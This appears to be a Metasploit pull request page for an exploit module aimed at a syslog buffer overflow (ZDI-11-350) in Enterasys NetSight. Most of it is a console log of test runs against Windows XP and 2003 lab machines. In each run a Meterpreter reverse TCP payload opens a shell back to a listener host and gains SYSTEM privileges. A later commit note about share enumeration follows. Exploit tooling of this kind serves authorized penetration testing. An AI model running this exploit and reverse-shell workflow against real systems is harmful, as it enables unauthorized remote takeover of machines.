Added module for ZDI-11-350 #1233

Merged
merged 3 commits into from Jan 3, 2013

jvazquez-r7
Contributor

Tested with Enterasys NetSight 4.0.1.34 on Windows XP SP3 and Windows 2003 SP2

msf  exploit(enterasys_netsight_syslog_bof) > reload
[*] Reloading module...
msf  exploit(enterasys_netsight_syslog_bof) > show options

Module options (exploit/windows/misc/enterasys_netsight_syslog_bof):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.146    yes       The target address
   RPORT  514              yes       The target port


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.128    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Enterasys NetSight 4.0.1.34 / Windows 2003 SP2


msf  exploit(enterasys_netsight_syslog_bof) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Enterasys NetSight 4.0.1.34 / Windows XP SP3
   1   Enterasys NetSight 4.0.1.34 / Windows 2003 SP2


msf  exploit(enterasys_netsight_syslog_bof) > set target 1
target => 1
msf  exploit(enterasys_netsight_syslog_bof) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.146:514 - Trying to exploit Enterasys NetSight 4.0.1.34 / Windows 2003 SP2...
[*] Sending stage (752128 bytes) to 192.168.1.146
[*] Meterpreter session 4 opened (192.168.1.128:4444 -> 192.168.1.146:3321) at 2013-01-03 17:26:14 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.146 - Meterpreter session 4 closed.  Reason: User exit
msf  exploit(enterasys_netsight_syslog_bof) > set target 0
target => 0
msf  exploit(enterasys_netsight_syslog_bof) > set rhost 192.168.1.145
rhost => 192.168.1.145
msf  exploit(enterasys_netsight_syslog_bof) > exploit

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.145:514 - Trying to exploit Enterasys NetSight 4.0.1.34 / Windows XP SP3...
[*] Sending stage (752128 bytes) to 192.168.1.145
[*] Meterpreter session 5 opened (192.168.1.128:4444 -> 192.168.1.145:2839) at 2013-01-03 17:27:46 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.145 - Meterpreter session 5 closed.  Reason: User exit
msf  exploit(enterasys_netsight_syslog_bof) > 

@wchen-r7 wchen-r7 merged commit a0b4045 into rapid7:master Jan 3, 2013
wchen-r7 added a commit to wchen-r7/metasploit-framework that referenced this pull request Jul 11, 2013
[SeeRM:rapid7#1233] - This is an upgrade based on ringt's code in PR rapid7#2017.
As a pentester, it's useful to obtain additional information such as
device type, access rights, folders, and files, etc when doing a share
enumeration.  I have also enhanced exception handling to avoid shutting
errors up, which is better for debugging purposes.
@jvazquez-r7 jvazquez-r7 deleted the enterasys_netsight_syslog_bof branch November 18, 2014 15:46